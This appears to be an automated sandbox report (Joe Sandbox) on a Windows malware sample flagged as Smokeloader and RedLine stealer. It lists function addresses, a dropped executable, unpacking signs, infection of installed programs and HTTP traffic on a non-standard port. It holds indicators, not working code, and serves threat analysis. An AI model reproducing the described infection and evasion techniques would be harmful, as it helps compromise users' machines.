Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00463FA0	0_2_00463FA0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00763047	0_2_00763047
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079A0F7	0_2_0079A0F7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00786083	0_2_00786083
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3167	0_2_007A3167
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0077215C	0_2_0077215C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076E127	0_2_0076E127
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079D1E7	0_2_0079D1E7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079E1C3	0_2_0079E1C3
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0077D187	0_2_0077D187
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00754277	0_2_00754277
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00743267	0_2_00743267
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00789252	0_2_00789252
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00789257	0_2_00789257
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00766231	0_2_00766231
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A4207	0_2_007A4207
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0075E2D7	0_2_0075E2D7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007772AF	0_2_007772AF
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0077D357	0_2_0077D357
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079E32F	0_2_0079E32F
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007673D6	0_2_007673D6
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079A3C7	0_2_0079A3C7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007513B7	0_2_007513B7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007873A2	0_2_007873A2
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007913A7	0_2_007913A7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00779386	0_2_00779386
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0078E387	0_2_0078E387
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A4447	0_2_007A4447
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079D437	0_2_0079D437
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0078B4F7	0_2_0078B4F7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007794C7	0_2_007794C7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0078A494	0_2_0078A494
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00799497	0_2_00799497
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076B57F	0_2_0076B57F
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00788DF9	0_2_00788DF9
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3507	0_2_007A3507
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007915D7	0_2_007915D7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079F5B9	0_2_0079F5B9
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0078E5A7	0_2_0078E5A7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076758C	0_2_0076758C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00754627	0_2_00754627
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0075F607	0_2_0075F607
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007556E7	0_2_007556E7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079F6BD	0_2_0079F6BD
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A26A7	0_2_007A26A7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3757	0_2_007A3757
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00779727	0_2_00779727
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00783717	0_2_00783717
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079C7B7	0_2_0079C7B7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00777797	0_2_00777797
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0078887B	0_2_0078887B
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A4847	0_2_007A4847
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079A819	0_2_0079A819
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00791807	0_2_00791807
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00784806	0_2_00784806
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007688E7	0_2_007688E7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007528D7	0_2_007528D7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076E967	0_2_0076E967
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00783967	0_2_00783967
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00779947	0_2_00779947
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079C9F7	0_2_0079C9F7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00771994	0_2_00771994
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00770A69	0_2_00770A69
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00767A47	0_2_00767A47
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00764A39	0_2_00764A39
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0075EA27	0_2_0075EA27
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076AAE1	0_2_0076AAE1
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A0AD7	0_2_007A0AD7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00779B77	0_2_00779B77
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3B57	0_2_007A3B57
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00766B1A	0_2_00766B1A
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00763B07	0_2_00763B07
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A2BF7	0_2_007A2BF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00772B97	0_2_00772B97
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00772B94	0_2_00772B94
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076EB87	0_2_0076EB87
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00753B87	0_2_00753B87
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079EB8E	0_2_0079EB8E
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A0CF7	0_2_007A0CF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079CCF7	0_2_0079CCF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00764C96	0_2_00764C96
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0077AD6E	0_2_0077AD6E
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079ED50	0_2_0079ED50
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076CD03	0_2_0076CD03
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3D87	0_2_007A3D87
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00785E7E	0_2_00785E7E
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00765E6E	0_2_00765E6E
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00777E68	0_2_00777E68
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A2E57	0_2_007A2E57
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076AE89	0_2_0076AE89
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0078AF2B	0_2_0078AF2B
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076CF1C	0_2_0076CF1C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00751FD7	0_2_00751FD7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079DFCF	0_2_0079DFCF
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00769FCC	0_2_00769FCC
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00787FB7	0_2_00787FB7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0075CF97	0_2_0075CF97
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079CF87	0_2_0079CF87
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00831166	0_2_00831166
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Code function: 1_2_00E96D00	1_2_00E96D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\jJEAWO.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794

Source: C:\Users\user\Desktop\current[1].exe	Code function: String function: 0041D6B0 appears 39 times
Source: C:\Users\user\Desktop\current[1].exe	Code function: String function: 0075D917 appears 38 times

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 1624

Source: MyProg.exe.1.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: current[1].exe, 00000000.00000000.1675365192.000000000047F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWonder4 vs current[1].exe
Source: current[1].exe, 00000000.00000003.1699663206.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWonder4 vs current[1].exe
Source: current[1].exe	Binary or memory string: OriginalFilenameWonder4 vs current[1].exe

Source: current[1].exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2053042174.000000000082E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: jJEAWO.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: current[1].exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jJEAWO.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: jJEAWO.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@6/15@2/2

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E9119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

1_2_00E9119F

Source: C:\Users\user\Desktop\current[1].exe

Code function: 0_2_0082F056 CreateToolhelp32Snapshot,Module32First,

0_2_0082F056

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7452
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7436

Source: C:\Users\user\Desktop\current[1].exe

File created: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Jump to behavior

Source: C:\Users\user\Desktop\current[1].exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\current[1].exe

File read: C:\Users\user\Desktop\current[1].exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\current[1].exe "C:\Users\user\Desktop\current[1].exe"
Source: C:\Users\user\Desktop\current[1].exe	Process created: C:\Users\user\AppData\Local\Temp\jJEAWO.exe C:\Users\user\AppData\Local\Temp\jJEAWO.exe
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 1624
Source: C:\Users\user\Desktop\current[1].exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1504
Source: C:\Users\user\Desktop\current[1].exe	Process created: C:\Users\user\AppData\Local\Temp\jJEAWO.exe C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Jump to behavior

Source: C:\Users\user\Desktop\current[1].exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\current[1].exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: current[1].exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source:	Binary string: .C:\yatafekubigu\xegoh\kegokececana\hobof.pdb source: current[1].exe
Source:	Binary string: C:\yatafekubigu\xegoh\kegokececana\hobof.pdb source: current[1].exe

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\current[1].exe	Unpacked PE file: 0.2.current[1].exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;ESu,:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Unpacked PE file: 1.2.jJEAWO.exe.e90000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\current[1].exe

Unpacked PE file: 0.2.current[1].exe.400000.0.unpack

Source: initial sample

Static PE information: section where entry point is pointing to: ESu,

Source: current[1].exe	Static PE information: section name: ESu,
Source: jJEAWO.exe.0.dr	Static PE information: section name: .aspack
Source: jJEAWO.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr	Static PE information: section name: PELIB
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.1.dr	Static PE information: section name: u

Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0046AEDC push edi; iretd	0_2_0046AEDD
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00469FC4 push edx; ret	0_2_00469FC5
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00830B3E push edx; ret	0_2_00830B3F
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Code function: 1_2_00E91638 push dword ptr [00E93084h]; ret	1_2_00E9170E
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Code function: 1_2_00E9600A push ebp; ret	1_2_00E9600D
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Code function: 1_2_00E92D9B push ecx; ret	1_2_00E92DAB
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Code function: 1_2_00E96014 push 00E914E1h; ret	1_2_00E96425

Source: current[1].exe	Static PE information: section name: .text entropy: 7.864241341045099
Source: current[1].exe	Static PE information: section name: ESu, entropy: 6.934721013700985
Source: jJEAWO.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ entropy: 6.934597182758975
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR entropy: 6.935322309363604
Source: SciTE.exe.1.dr	Static PE information: section name: u entropy: 6.934363744578973

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\Desktop\current[1].exe	File created: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 799

Source: C:\Users\user\Desktop\current[1].exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
